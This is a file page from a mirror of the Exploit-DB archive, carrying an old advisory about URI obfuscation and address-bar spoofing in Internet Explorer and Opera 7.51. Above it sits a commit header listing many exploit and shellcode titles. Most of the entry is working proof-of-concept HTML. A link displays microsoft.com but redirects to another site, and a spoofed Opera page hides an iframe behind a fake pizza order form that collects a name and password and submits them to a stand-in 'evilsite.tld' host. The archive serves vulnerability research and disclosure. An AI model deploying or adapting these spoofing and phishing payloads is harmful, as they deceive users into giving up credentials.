bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/24189.html
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

156 lines
No EOL
4.9 KiB
HTML
Raw Blame History

source: https://www.securityfocus.com/bid/10517/info
A weakness is reported in Microsoft Internet Explorer and Opera allowing an attacker to obfuscate the URI of a link. This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users.
An attacker may exploit this weakness to make a user think they are visiting a legitimate site, when in reality they are being redirected to an attacker controlled site.
Update: an attacker may be able to use this issue to bypass zone restrictions in Internet Explorer.
Opera 7.51 is also affected.
!-- 10.06.04 courtesy of: bitlance bitlance_3@hotmail.com -->
<a title=" http://www.microsoft.com" href="http://www.microsoft.com">
<table>
<caption>
<a href="http://www.microsoft.com">
<label for="foo">
<u style="cursor: pointer; color: blue">
http://www.microsoft.com
</u>
</label>
</a>
<form method="get" action="http://www.microsoft.com%2F redir=www.e-gold.com">
<input id="foo" type="image" height="0" width="0">
</form>
Regular URIs are also vulnerable:
<a href="http://www.microsoft.com%2F redir=www.e-gold.com">test</a>
The following proof of concept is available for Opera:
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[meta http-equiv="REFRESH"
content="0;url=javascript:(function(){})();"]
[title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
[script type="text/javascript"]
[!-- hide JavaScript from old browsers
var dummy="Do not remove this script element.";
// end hiding JavaScript --]
[/script]
[style type="text/css"]
[!-- /* hide iframe element. */
iframe {
display: none !important;
}
/* hide iframe element. */ --]
[!-- /* pizza form */
body {
margin-left: 2em;
margin-right: 2em;
font-family:verdana;
font-size:80%;
}
h1 { font-size:120%;}
h2 { font-size:100%;}
table { font-size:85%; background-color:buttonface; }
table caption {
background-color:activecaption; color:captiontext;
font-weight:bold; text-align:left; }
table table { font-size:100%; }
table input { font-family:verdana; font-size:100%; }
table select { font-family:verdana; font-size:100%; }
/* pizza form */ --]
[/style]
[/head]
[body]
[h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
[h2]Tested on Windows OS[/h2]
[p][a href="http://www.opera.com/" title="Opera 7.51, Everything You Need
Online"]
Opera 7.51[/a], Everything You Need Online
[/p]
[iframe title="inline frame spoofing address bar"
src="https://pizza.opera.com/order.html"]
This inline frame is hidden. See CSS.
[/iframe]
[!-- below, phishing form order pizza --]
[h2]Welcome to Pizza Opera dot Com[/h2]
[form name="frmPizza" action="phishing://evilsite.tld"]
[table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
[caption]Order Your Pizza[/caption]
[tr valign="top"]
[td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
[td][input type="text" name="txtName" id="txtName"][/td]
[/tr]
[tr valign="top"]
[td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
[td][input type="password" name="txtPassword" id="txtPassword"][/td]
[/tr]
[tr valign="top"]
[td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
[td]
[select name="selSize" id="selSize"]
[option value="0"]--- pick a size --- [/option]
[option value="1"]Small[/option]
[option value="2"]Medium[/option]
[option value="3"]Large[/option]
[/select]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2"]
[fieldset id="fstCrust"]
[legend]Crust[/legend]
[table cellpadding="1" cellspacing="0"]
[tr]
[td][input type="radio" name="radCrust" id="radCrust_Thick"
value="Thick"][/td]
[td][label for="radCrust_Thick"
accesskey="K"]Thic[u]k[/u][/label][/td]
[td][input type="radio" name="radCrust" id="radCrust_Thin"
value="Thin"][/td]
[td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
[/tr]
[/table]
[/fieldset]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2"]
[fieldset id="fstToppings"]
[legend]Toppings[/legend]
[table cellpadding="1" cellspacing="0"]
[tr]
[td][input type="checkbox" name="chkHam" id="chkHam" value="Ham"][/td]
[td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
[/tr]
[tr]
[td][input type="checkbox" name="chkPineapple" id="chkPineapple"
value="Pineapple"][/td]
[td][label for="chkPineapple"
accesskey="I"]P[u]i[/u]neapple[/label][/td]
[/tr]
[tr]
[td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese"
value="Extra Cheese"][/td]
[td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra
Cheese[/label][/td]
[/tr]
[/table]
[/fieldset]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2" align="right"][input type="submit" value=" Order!
"][/td]
[/tr]
[/table]
[/form]
[/body]
[/html]
Reference in a new issue View git blame Copy permalink